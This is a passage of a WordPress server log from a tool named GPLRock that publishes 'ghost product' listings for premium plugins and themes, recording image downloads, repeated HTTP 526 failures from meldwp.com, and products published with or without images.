shipping-details-plugin-for-woocommerce [05-Apr-2026 03:27:21 UTC] GPLRock: Image downloaded successfully for product ebay-aliexpress-wooimporter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f5bbb63.jpg [05-Apr-2026 03:27:21 UTC] GPLRock: Using pre-downloaded image for product ebay-aliexpress-wooimporter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f5bbb63.jpg [05-Apr-2026 03:27:21 UTC] GPLRock: Ghost product published with image - Product ID: ebay-aliexpress-wooimporter [05-Apr-2026 03:27:22 UTC] GPLRock: Image downloaded successfully for product soliloquy-defaults-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2817b619.jpg [05-Apr-2026 03:27:22 UTC] GPLRock: Using pre-downloaded image for product soliloquy-defaults-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2817b619.jpg [05-Apr-2026 03:27:22 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-defaults-addon [05-Apr-2026 03:27:24 UTC] GPLRock: Image downloaded successfully for product mainwp-blogvault (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bba0aa42.jpg [05-Apr-2026 03:27:24 UTC] GPLRock: Using pre-downloaded image for product mainwp-blogvault: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bba0aa42.jpg [05-Apr-2026 03:27:24 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-blogvault [05-Apr-2026 03:27:25 UTC] GPLRock: Image downloaded successfully for product woocommerce-bulk-edit-variable-products-prices (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4309b3df.jpg [05-Apr-2026 03:27:25 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bulk-edit-variable-products-prices: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4309b3df.jpg [05-Apr-2026 03:27:25 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bulk-edit-variable-products-prices [05-Apr-2026 03:27:26 UTC] GPLRock: Image downloaded successfully for product black-label-fullscreen-video-image-background (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b357fa81.jpg [05-Apr-2026 03:27:26 UTC] GPLRock: Using pre-downloaded image for product black-label-fullscreen-video-image-background: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b357fa81.jpg [05-Apr-2026 03:27:26 UTC] GPLRock: Ghost product published with image - Product ID: black-label-fullscreen-video-image-background [05-Apr-2026 03:27:28 UTC] GPLRock: Image downloaded successfully for product themify-builder-mosaic (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61518176.jpg [05-Apr-2026 03:27:28 UTC] GPLRock: Using pre-downloaded image for product themify-builder-mosaic: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61518176.jpg [05-Apr-2026 03:27:28 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-mosaic [05-Apr-2026 03:27:30 UTC] GPLRock: Image downloaded successfully for product mythemeshop-socialnow-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ebdef6c9.jpg [05-Apr-2026 03:27:30 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-socialnow-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ebdef6c9.jpg [05-Apr-2026 03:27:30 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-socialnow-wordpress-theme [05-Apr-2026 03:31:08 UTC] GPLRock: Image download failed for product mixy-organic-food-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:10 UTC] GPLRock: Image download failed for product mixy-organic-food-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mixy---organic-food-store-wordpress-theme-8394.webp for product mixy-organic-food-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:31:12 UTC] GPLRock: Image download failed for product mixy-organic-food-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:15 UTC] GPLRock: Image download failed for product mixy-organic-food-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mixy---organic-food-store-wordpress-theme-8394.webp for product mixy-organic-food-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:31:17 UTC] GPLRock WARNING: Image download failed for product mixy-organic-food-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mixy---organic-food-store-wordpress-theme-8394.webp [05-Apr-2026 03:31:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mixy-organic-food-store-wordpress-theme [05-Apr-2026 03:31:17 UTC] GPLRock: Image download failed for product ratency-review-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:19 UTC] GPLRock: Image download failed for product ratency-review-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ratency---review--magazine-wordpress-theme-28394.webp for product ratency-review-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:31:21 UTC] GPLRock: Image download failed for product ratency-review-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:23 UTC] GPLRock: Image download failed for product ratency-review-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:31:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ratency---review--magazine-wordpress-theme-28394.webp for product ratency-review-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:31:25 UTC] GPLRock WARNING: Image download failed for product ratency-review-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ratency---review--magazine-wordpress-theme-28394.webp [05-Apr-2026 03:31:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ratency-review-magazine-wordpress-theme [05-Apr-2026 03:31:26 UTC] GPLRock: Image download failed for product vedio-video-production-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:41:12 UTC] GPLRock: Image downloaded successfully for product fana-fashion-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-166166d0.png [05-Apr-2026 03:41:12 UTC] GPLRock: Using pre-downloaded image for product fana-fashion-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-166166d0.png [05-Apr-2026 03:41:12 UTC] GPLRock: Ghost product published with image - Product ID: fana-fashion-shop-wordpress-theme [05-Apr-2026 03:41:14 UTC] GPLRock: Image downloaded successfully for product dynamic-ooo-dynamic-shortcodes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fe49244.webp [05-Apr-2026 03:41:14 UTC] GPLRock: Using pre-downloaded image for product dynamic-ooo-dynamic-shortcodes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fe49244.webp [05-Apr-2026 03:41:14 UTC] GPLRock: Ghost product published with image - Product ID: dynamic-ooo-dynamic-shortcodes [05-Apr-2026 03:41:16 UTC] GPLRock: Image downloaded successfully for product learnpress-wpml-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-873646a7.webp [05-Apr-2026 03:41:16 UTC] GPLRock: Using pre-downloaded image for product learnpress-wpml-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-873646a7.webp [05-Apr-2026 03:41:16 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-wpml-addon [05-Apr-2026 03:41:18 UTC] GPLRock: Image downloaded successfully for product biztech-corporate-consulting-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e78b8e8.png [05-Apr-2026 03:41:18 UTC] GPLRock: Using pre-downloaded image for product biztech-corporate-consulting-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e78b8e8.png [05-Apr-2026 03:41:18 UTC] GPLRock: Ghost product published with image - Product ID: biztech-corporate-consulting-business-wordpress-theme [05-Apr-2026 03:41:20 UTC] GPLRock: Image downloaded successfully for product visibility-logic-for-elementor-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-15358c33.jpg [05-Apr-2026 03:41:20 UTC] GPLRock: Using pre-downloaded image for product visibility-logic-for-elementor-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-15358c33.jpg [05-Apr-2026 03:41:20 UTC] GPLRock: Ghost product published with image - Product ID: visibility-logic-for-elementor-pro [05-Apr-2026 03:41:22 UTC] GPLRock: Image downloaded successfully for product errin-personal-blog-revolutionary-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d3e703de.jpg [05-Apr-2026 03:41:22 UTC] GPLRock: Using pre-downloaded image for product errin-personal-blog-revolutionary-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d3e703de.jpg [05-Apr-2026 03:41:22 UTC] GPLRock: Ghost product published with image - Product ID: errin-personal-blog-revolutionary-wordpress-theme [05-Apr-2026 03:41:24 UTC] GPLRock: Image downloaded successfully for product metro-minimal-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e252c322.jpg [05-Apr-2026 03:41:24 UTC] GPLRock: Using pre-downloaded image for product metro-minimal-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e252c322.jpg [05-Apr-2026 03:41:24 UTC] GPLRock: Ghost product published with image - Product ID: metro-minimal-woocommerce-wordpress-theme [05-Apr-2026 03:41:26 UTC] GPLRock: Image downloaded successfully for product fluma-influencer-marketing-agency-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff878a3a.jpg [05-Apr-2026 03:41:26 UTC] GPLRock: Using pre-downloaded image for product fluma-influencer-marketing-agency-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff878a3a.jpg [05-Apr-2026 03:41:26 UTC] GPLRock: Ghost product published with image - Product ID: fluma-influencer-marketing-agency-elementor-pro-template-kit [05-Apr-2026 03:51:19 UTC] GPLRock: Image download failed for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:21 UTC] GPLRock: Image download failed for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/workreap-meetings---streamline-your-meetings-in-the-workreap-theme-26676.webp for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:23 UTC] GPLRock: Image download failed for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:25 UTC] GPLRock: Image download failed for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/workreap-meetings---streamline-your-meetings-in-the-workreap-theme-26676.webp for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:28 UTC] GPLRock WARNING: Image download failed for product workreap-meetings-streamline-your-meetings-in-the-workreap-theme. URL: https://meldwp.com/wp-content/uploads/workreap-meetings---streamline-your-meetings-in-the-workreap-theme-26676.webp [05-Apr-2026 03:51:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: workreap-meetings-streamline-your-meetings-in-the-workreap-theme [05-Apr-2026 03:51:28 UTC] GPLRock: Image download failed for product html5-video-player-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:30 UTC] GPLRock: Image download failed for product html5-video-player-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/html5-video-player-wordpress-plugin-9302.webp for product html5-video-player-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:32 UTC] GPLRock: Image download failed for product html5-video-player-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:34 UTC] GPLRock: Image download failed for product html5-video-player-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/html5-video-player-wordpress-plugin-9302.webp for product html5-video-player-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:36 UTC] GPLRock WARNING: Image download failed for product html5-video-player-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/html5-video-player-wordpress-plugin-9302.webp [05-Apr-2026 03:51:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: html5-video-player-wordpress-plugin [05-Apr-2026 03:51:36 UTC] GPLRock: Image download failed for product woocommerce-event-ticket (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:38 UTC] GPLRock: Image download failed for product woocommerce-event-ticket (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-event-ticket-13676.webp for product woocommerce-event-ticket after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:41 UTC] GPLRock: Image download failed for product woocommerce-event-ticket (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:43 UTC] GPLRock: Image download failed for product woocommerce-event-ticket (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-event-ticket-13676.webp for product woocommerce-event-ticket after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:45 UTC] GPLRock WARNING: Image download failed for product woocommerce-event-ticket. URL: https://meldwp.com/wp-content/uploads/woocommerce-event-ticket-13676.webp [05-Apr-2026 03:51:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-event-ticket [05-Apr-2026 03:51:45 UTC] GPLRock: Image download failed for product multi-hospital-hospital-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:47 UTC] GPLRock: Image download failed for product multi-hospital-hospital-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-hospital---hospital-management-system-19623.webp for product multi-hospital-hospital-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:49 UTC] GPLRock: Image download failed for product multi-hospital-hospital-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:51 UTC] GPLRock: Image download failed for product multi-hospital-hospital-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-hospital---hospital-management-system-19623.webp for product multi-hospital-hospital-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:53 UTC] GPLRock WARNING: Image download failed for product multi-hospital-hospital-management-system. URL: https://meldwp.com/wp-content/uploads/multi-hospital---hospital-management-system-19623.webp [05-Apr-2026 03:51:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multi-hospital-hospital-management-system [05-Apr-2026 03:51:54 UTC] GPLRock: Image download failed for product adf-amazon-discount-finder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:56 UTC] GPLRock: Image download failed for product adf-amazon-discount-finder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:51:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adf---amazon-discount-finder-for-wordpress-28890.webp for product adf-amazon-discount-finder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:51:58 UTC] GPLRock: Image download failed for product adf-amazon-discount-finder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:00 UTC] GPLRock: Image download failed for product adf-amazon-discount-finder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adf---amazon-discount-finder-for-wordpress-28890.webp for product adf-amazon-discount-finder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:02 UTC] GPLRock WARNING: Image download failed for product adf-amazon-discount-finder-for-wordpress. URL: https://meldwp.com/wp-content/uploads/adf---amazon-discount-finder-for-wordpress-28890.webp [05-Apr-2026 03:52:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adf-amazon-discount-finder-for-wordpress [05-Apr-2026 03:52:02 UTC] GPLRock: Image download failed for product pdf-password-protect (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:04 UTC] GPLRock: Image download failed for product pdf-password-protect (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pdf-password-protect-10841.webp for product pdf-password-protect after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:07 UTC] GPLRock: Image download failed for product pdf-password-protect (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:09 UTC] GPLRock: Image download failed for product pdf-password-protect (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pdf-password-protect-10841.webp for product pdf-password-protect after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:11 UTC] GPLRock WARNING: Image download failed for product pdf-password-protect. URL: https://meldwp.com/wp-content/uploads/pdf-password-protect-10841.webp [05-Apr-2026 03:52:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pdf-password-protect [05-Apr-2026 03:52:11 UTC] GPLRock: Image download failed for product gym-master-gym-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:13 UTC] GPLRock: Image download failed for product gym-master-gym-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gym-master---gym-management-system-20891.webp for product gym-master-gym-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:15 UTC] GPLRock: Image download failed for product gym-master-gym-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:17 UTC] GPLRock: Image download failed for product gym-master-gym-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gym-master---gym-management-system-20891.webp for product gym-master-gym-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:20 UTC] GPLRock WARNING: Image download failed for product gym-master-gym-management-system. URL: https://meldwp.com/wp-content/uploads/gym-master---gym-management-system-20891.webp [05-Apr-2026 03:52:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gym-master-gym-management-system [05-Apr-2026 03:52:20 UTC] GPLRock: Image download failed for product plus-admin-theme-wordpress-white-label-branding-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:22 UTC] GPLRock: Image download failed for product plus-admin-theme-wordpress-white-label-branding-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plus-admin-theme---wordpress-white-label-branding-admin-theme-24615.webp for product plus-admin-theme-wordpress-white-label-branding-admin-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:24 UTC] GPLRock: Image download failed for product plus-admin-theme-wordpress-white-label-branding-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:26 UTC] GPLRock: Image download failed for product plus-admin-theme-wordpress-white-label-branding-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plus-admin-theme---wordpress-white-label-branding-admin-theme-24615.webp for product plus-admin-theme-wordpress-white-label-branding-admin-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:28 UTC] GPLRock WARNING: Image download failed for product plus-admin-theme-wordpress-white-label-branding-admin-theme. URL: https://meldwp.com/wp-content/uploads/plus-admin-theme---wordpress-white-label-branding-admin-theme-24615.webp [05-Apr-2026 03:52:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: plus-admin-theme-wordpress-white-label-branding-admin-theme [05-Apr-2026 03:52:28 UTC] GPLRock: Image download failed for product visual-composer-pricing-tables-by-nbgoyani (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:30 UTC] GPLRock: Image download failed for product visual-composer-pricing-tables-by-nbgoyani (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer--pricing-tables-by-nbgoyani-15601.webp for product visual-composer-pricing-tables-by-nbgoyani after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:33 UTC] GPLRock: Image download failed for product visual-composer-pricing-tables-by-nbgoyani (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:35 UTC] GPLRock: Image download failed for product visual-composer-pricing-tables-by-nbgoyani (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer--pricing-tables-by-nbgoyani-15601.webp for product visual-composer-pricing-tables-by-nbgoyani after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:37 UTC] GPLRock WARNING: Image download failed for product visual-composer-pricing-tables-by-nbgoyani. URL: https://meldwp.com/wp-content/uploads/visual-composer--pricing-tables-by-nbgoyani-15601.webp [05-Apr-2026 03:52:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-pricing-tables-by-nbgoyani [05-Apr-2026 03:52:37 UTC] GPLRock: Image download failed for product woocommerce-variations-table (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:39 UTC] GPLRock: Image download failed for product woocommerce-variations-table (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variations-table-2608.webp for product woocommerce-variations-table after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:41 UTC] GPLRock: Image download failed for product woocommerce-variations-table (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:43 UTC] GPLRock: Image download failed for product woocommerce-variations-table (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variations-table-2608.webp for product woocommerce-variations-table after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:52:45 UTC] GPLRock WARNING: Image download failed for product woocommerce-variations-table. URL: https://meldwp.com/wp-content/uploads/woocommerce-variations-table-2608.webp [05-Apr-2026 03:52:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-variations-table [05-Apr-2026 03:52:56 UTC] GPLRock: Image download failed for product maintenance-mode-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:52:58 UTC] GPLRock: Image download failed for product maintenance-mode-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maintenance-mode---wordpress-plugin-8682.webp for product maintenance-mode-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:00 UTC] GPLRock: Image download failed for product maintenance-mode-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:02 UTC] GPLRock: Image download failed for product maintenance-mode-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maintenance-mode---wordpress-plugin-8682.webp for product maintenance-mode-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:04 UTC] GPLRock WARNING: Image download failed for product maintenance-mode-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/maintenance-mode---wordpress-plugin-8682.webp [05-Apr-2026 03:53:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maintenance-mode-wordpress-plugin [05-Apr-2026 03:53:04 UTC] GPLRock: Image downloaded successfully for product progresser-progress-bar-and-progress-circle-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92ebec9a.webp [05-Apr-2026 03:53:04 UTC] GPLRock: Using pre-downloaded image for product progresser-progress-bar-and-progress-circle-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92ebec9a.webp [05-Apr-2026 03:53:04 UTC] GPLRock: Ghost product published with image - Product ID: progresser-progress-bar-and-progress-circle-for-elementor [05-Apr-2026 03:53:04 UTC] GPLRock: Image download failed for product woocommerce-product-tabs-custom-dynamic-tabs-for-products (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:07 UTC] GPLRock: Image download failed for product woocommerce-product-tabs-custom-dynamic-tabs-for-products (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-tabs--custom--dynamic-tabs-for-products-13499.webp for product woocommerce-product-tabs-custom-dynamic-tabs-for-products after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:09 UTC] GPLRock: Image download failed for product woocommerce-product-tabs-custom-dynamic-tabs-for-products (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:11 UTC] GPLRock: Image download failed for product woocommerce-product-tabs-custom-dynamic-tabs-for-products (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-tabs--custom--dynamic-tabs-for-products-13499.webp for product woocommerce-product-tabs-custom-dynamic-tabs-for-products after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:13 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-tabs-custom-dynamic-tabs-for-products. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-tabs--custom--dynamic-tabs-for-products-13499.webp [05-Apr-2026 03:53:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-tabs-custom-dynamic-tabs-for-products [05-Apr-2026 03:53:13 UTC] GPLRock: Image download failed for product woo-extra-slider-woocommerce-wordpress-slider-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:15 UTC] GPLRock: Image download failed for product woo-extra-slider-woocommerce-wordpress-slider-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-extra-slider---woocommerce-wordpress-slider-plugin-27752.webp for product woo-extra-slider-woocommerce-wordpress-slider-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:17 UTC] GPLRock: Image download failed for product woo-extra-slider-woocommerce-wordpress-slider-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:20 UTC] GPLRock: Image 